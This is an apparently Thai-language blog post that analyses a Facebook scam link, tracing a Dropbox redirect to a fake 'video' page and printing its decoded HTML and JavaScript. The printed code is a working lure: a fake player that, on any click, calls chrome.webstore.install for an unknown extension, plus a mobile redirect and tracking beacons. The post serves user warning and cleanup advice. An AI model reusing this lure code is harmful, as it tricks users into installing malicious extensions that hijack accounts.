มัน link ไปหา dropbox จริงๆ ครับ แต่มันจะทำ link เป็น https://www.dropbox.com/s/z12b1j3augfdwgv/havifegedofelevudipe.html?raw=1 ซึ่งการส่งค่า raw=1 เข้าไปจะทำให้ dropbox ส่งไฟล์ html ออกมาให้ browser เปิดแสดงผล (execute) โดยตรง (ถ้าเราตัด ?raw=1 จะเป็นหน้า download file) เมื่อดูใน source code จะเจอว่ามีแค่บรรทัดเดียวคือ redirect ไปหาอีกเว็บ
<!-- Zero-delay meta refresh: the only content of the Dropbox-hosted file; it immediately sends the browser to the S3-hosted page named in url=. -->
<meta http-equiv="refresh" content="0;url=http://032zl6p.s3.amazonaws.com/index.html?add"/> Loader
และเมื่อเราตามไปที่เว็บนั้นจะเจอหน้าเว็บที่ผู้ใช้ facebook กด link ไปแล้วเจอ
เป็นหน้า facebook หลอกที่ทำเป็นว่ามี vdo รอให้กด เมื่อเข้าไปดู source code ของหน้านี้จะพบว่าเข้ารหัสไว้
ซึ่งเป็นการเข้ารหัสง่ายๆ ด้วยคำสั่ง unescape เฉยๆ (จริงๆ เป็นแค่ URL encoding เพื่ออำพรางโค้ด ไม่ใช่การเข้ารหัสลับ) แกะง่ายๆ โดยไปหาเว็บ online decode เอา ผมลองใช้เว็บ http://www.utilities-online.info/urlencode/#.VRvArWSqqko แกะดูได้ source ตามนี้
<!-- Analyst annotation (comments only; markup and script are unchanged): decoded source of the fake Facebook video page, kept as evidence. -->
<html xmlns="http://www.w3.org/1999/xhtml" prefix="og: http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script>
/* okkkkk is the Chrome Web Store item id reused by the install code further down. */
var okkkkk = "amokjilhfcgjcbbbihfbpbacbfdedehp";
/* Requests an image from whos.amung.us on page load (presumably a visitor counter; confirm). */
new Image().src = "http://whos.amung.us/widget/danielpr1.png";
/* If the user-agent string matches either mobile regex, the browser is sent to the URL passed as b. */
(function(a, b) { if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 
)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) window.location = b })(navigator.userAgent || navigator.vendor || window.opera, 'http://mobileredirect.net/?affilysismedia'); </script> <title>Facebook - Video Special - facebook.com</title> <link rel="stylesheet" href="./index_files/style.css" type="text/css" media="screen"> <script src="//code.jquery.com/jquery-1.7.2.min.js"></script> <link rel="shortcut icon" href="https://fbstatic-a.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico"> </head> <script>
/* Writes a chrome-webstore-item link element whose href is built from the item id in okkkkk. */
document.write('<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/' + okkkkk + '">'); </script>
<!-- A click anywhere inside the body calls chromex(), defined in the last script of the page. -->
<body onclick="chromex();"> <div id="fb-root"></div> <div id="header"> <div id="bar"></div> </div> <div id="main"> <div id="contenido"> <div id="contenido-bg"></div> <div id="titulo">Facebook - Video Special - facebook.com</div> <!-- #### VIDEO ### -->
<!-- The "player" below is only styled div elements with a background image; no video element is present. -->
<div class="youtubeblocker" style="width:500px;height:300px;background:#000000;"> <div class="image" style="background-image: url('../wp-content/uploads/2014/07/fgfdgpl.jpg')"></div> <div class="play-button"></div> <div class="controlls"> <div class="left-controlls"></div> <div class="right-controlls"></div> </div> <div class="overlay"></div> <div class="sharebox"></div> </div> <!-- #### 
VIDEO ### --> <div id="titulo-bottom"> <a href="http://global.affilysis.com/directclick/?aid=27215&uid=1388"><img src="http://www.affilysis.com/dsg.gif"></a> </div> <div id="fb-root"></div> <fb:comments href="http://v2.vidsawesome.com/?videos=pierde-la-virginidad-video-regazza-perdere-la-verginita-molto-duro" num_posts="10" width="500"></fb:comments> </div> <div id="sidebar"> <div id="sidebar-bg"></div> </div> </div>
<!-- undeContinue is a full-page dimming layer and continue is an image box; both start hidden and are shown by chromex(). -->
<div id="undeContinue" style="background: #000; height: 100%; opacity: 0.5; position: fixed; width: 100%; z-index: 99; top: 0; left: 0; display: none;"></div> <div id="continue" style="background: no-repeat center; width: 379px; height: 76px; position: fixed; left: 50%; top: 305px; margin-left: -190px; display: none; z-index: 100;"></div> <script type="text/javascript">
/* Clicking the fake player also calls chromex(). */
$(document).ready(function() { $('.youtubeblocker').click(function() { chromex(); }); }); var addBox = document.getElementById('continue'); var anderBox = document.getElementById('undeContinue');
/* Chooses the overlay image path from the first two letters of the browser language; languages missing from the map fall back to 'en'. */
var pathByLang = { 'ar': 'ar', 'de': 'de', 'en': 'en', 'hi': 'hi', 'id': 'id', 'it': 'it', 'ja': 'ja', 'nl': 'nl', 'fa': 'pe', 'pt': 'pt', 'th': 'th', 'fi': 'tl', 'tr': 'tr', 'vi': 'vi' }; var userLang = navigator.language || navigator.userLanguage; var langKey = userLang.substr(0, 2); switch (pathByLang[langKey]) { case 'hi': addBox.style.top = '450px'; break; case 'ja': addBox.style.top = '330px'; break; case undefined: langKey = 'en'; break; } addBox.style.backgroundImage = "".concat('url("http://lp.ilividnewtab.com/images/chrome_extension/',pathByLang[langKey],'/ilividnewtab-continue.png")');
/* chromex(): calls chrome.webstore.install for the item id in okkkkk. First callback (install succeeded): flashes the background, requests a second whos.amung.us image, shows a message, navigates to the goo.gl URL and schedules window.close(). Second callback (install failed or was cancelled): turns the page red and asks the user to add the extension again. The dimming layer and image box are shown 500 ms and 1000 ms after each call. */
function chromex() { chrome.webstore.install('https://chrome.google.com/webstore/detail/' + okkkkk + '', function() { document.getElementsByTagName("body")[0].setAttribute("style", "background-color: #6ee552;"); new Image().src = "http://whos.amung.us/widget/danile0x2.png"; titulo.innerHTML = " Thx For Your Setup, Setup Successfully. 
Please Wait 3 Seconds, Video Starting..."; alert('Thx For Your Setup, Setup Successfully. \r\n Please Wait 3 Seconds, Video Starting.'); location.href = "http://goo.gl/Rz4YM0"; setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #6ee552;");', 1000); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 1500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #6ee552;");', 2000); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 2500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #6ee552;");', 3000); setTimeout('window.close();', 4000); setTimeout('anderBox.style.display = "none"', 500); setTimeout('addBox.style.display = "none";', 1000); }, function(err) { document.getElementsByTagName("body")[0].setAttribute("style", "background-color: red;"); titulo.innerHTML = "Ooopps ! you canceled setup, Please add Add Player Add Button..."; alert('Ooopps ! 
you canceled setup, Please add Add Player Add Button...'); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: red;");', 1000); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 1500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: red;");', 2000); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 2500); setTimeout('anderBox.style.display = "none"', 500); setTimeout('addBox.style.display = "none";', 1000); }); setTimeout('anderBox.style.display = "block"', 500); setTimeout('addBox.style.display = "block";', 1000); } </script> </body> </html>
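หลักๆ ก็น่าจะเป็นหลอกให้กดเพื่อเก็บ token ของเรา และ auto share + tag ให้เพื่อนเราเห็นมากที่สุดกระจายตัวไปเรื่อยๆ โดยจาก source ข้างบนจะเห็นว่าทุกครั้งที่กดบนหน้าเว็บ มันจะเรียก chrome.webstore.install เพื่อให้เราติดตั้ง Chrome extension ตาม ID ในตัวแปร okkkkk ซึ่งตัว extension นี้น่าจะเป็นตัวที่ทำงานต่อหลังจากนั้น ถ้าใครเผลอกดติดตั้งไปแล้ว ควรเข้าไปลบ extension ที่ไม่รู้จักออกจากหน้า chrome://extensions แล้วเปลี่ยนรหัสผ่าน facebook ด้วย ใครที่เห็น link อะไรแปลกๆ ที่ไม่น่าจะปรากฏใน facebook ก็อย่าไปกดเลยครับ อย่างอันนี้ link vdo แต่ url มาจาก dropbox ซึ่งน่าแปลกมาก มันเอา url dropbox มารับหน้าให้ดูน่าเชื่อถือแล้ว redirect ไปหา url เว็บของตัวเอง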